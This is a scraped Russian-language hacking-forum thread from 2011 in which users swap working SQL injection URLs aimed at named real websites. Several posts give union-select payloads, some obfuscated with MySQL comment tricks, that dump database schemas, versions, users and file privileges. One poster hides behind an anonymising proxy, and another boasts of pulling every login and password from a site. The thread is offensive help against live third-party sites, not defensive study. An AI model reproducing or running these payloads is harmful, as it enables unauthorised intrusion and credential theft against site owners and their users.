 |
|

14.12.2011, 13:55
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Код:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
Cannot get order by.. Any help please?[/QUOTE]
Сообщение от None
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317'+union+/*!select*/+1,2,3,4,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),6,7,8,9,10,11,12,13+--+
|
|
|

14.12.2011, 22:14
|
|
Познающий
Регистрация: 03.02.2009
Сообщений: 49
С нами:
9087772
Репутация:
403
|
|
http://pavlodarauto[antiG]ru/info/view.php?id=146
|
|
|

14.12.2011, 22:25
|
|
Новичок
Регистрация: 18.04.2007
Сообщений: 1
С нами:
10035004
Репутация:
0
|
|
Сообщение от _Spamer_
http://pavlodarauto[antiG]ru/info/view.php?id=146
Сообщение от None
http://pavlodarauto.ru/bd/baraholka_view.php?id=-1+/*!union+select*/+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21--
Плюсек мне
|
|
|

14.12.2011, 22:25
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от _Spamer_
http://pavlodarauto[antiG]ru/info/view.php?id=146
так можно сделать
Сообщение от None
http://pavlodarauto.ru/info/view.php?id=-146+union+/*!select*/+1,2,3,4,5,6,/*!concat*/(version(),0x3a,database(),0x3a,user()),8,9,10+--+
|
|
|

15.12.2011, 13:03
|
|
Новичок
Регистрация: 28.11.2011
Сообщений: 6
С нами:
7608566
Репутация:
0
|
|
Изучаю такую технологию как buffer overflow и постепенно погружаюсь в кернел хакинг, вопрос: на каком *никс дистрибутиве мне будит удобно писать ядерньки? =\ Остановился на выборе между gentoo & debian .
|
|
|

15.12.2011, 19:24
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от d1v
это если юзер один.
а если юзеров > 1, то
File_Priv from mysql.user where user= 'юзер'
а как тут?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user--+
[/COLOR][/COLOR]
выводит ошибку
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user+where+user=%27u198287@87%27--+
[/COLOR][/COLOR]
и так тоже ошибка
|
|
|

15.12.2011, 19:53
|
|
Новичок
Регистрация: 22.06.2011
Сообщений: 16
С нами:
7837526
Репутация:
0
|
|
Сообщение от Datax
Еще одна приватная бага ,работает на новых версиях.
Заходим например суда
http://soft.wlok.ru
Делаем запрос
http://soft.wlok.ru/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 999999999999999999/
Цифры девять ,нужно написать слитно.
Видим
Раскручивайте дальше сами, я например вытаскивал все пароли и логины.
Как раскручивать такие скули?
|
|
|

15.12.2011, 21:33
|
|
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами:
7719446
Репутация:
0
|
|
Подскажите
|
|
|

15.12.2011, 21:34
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Крути как обычно =/
http://site/login_login_groovy/1'+...
lansia1 чет не крутится.. Мб не скулья?
|
|
|

15.12.2011, 21:36
|
|
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами:
7719446
Репутация:
0
|
|
Ereee
Спасибо,понял)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|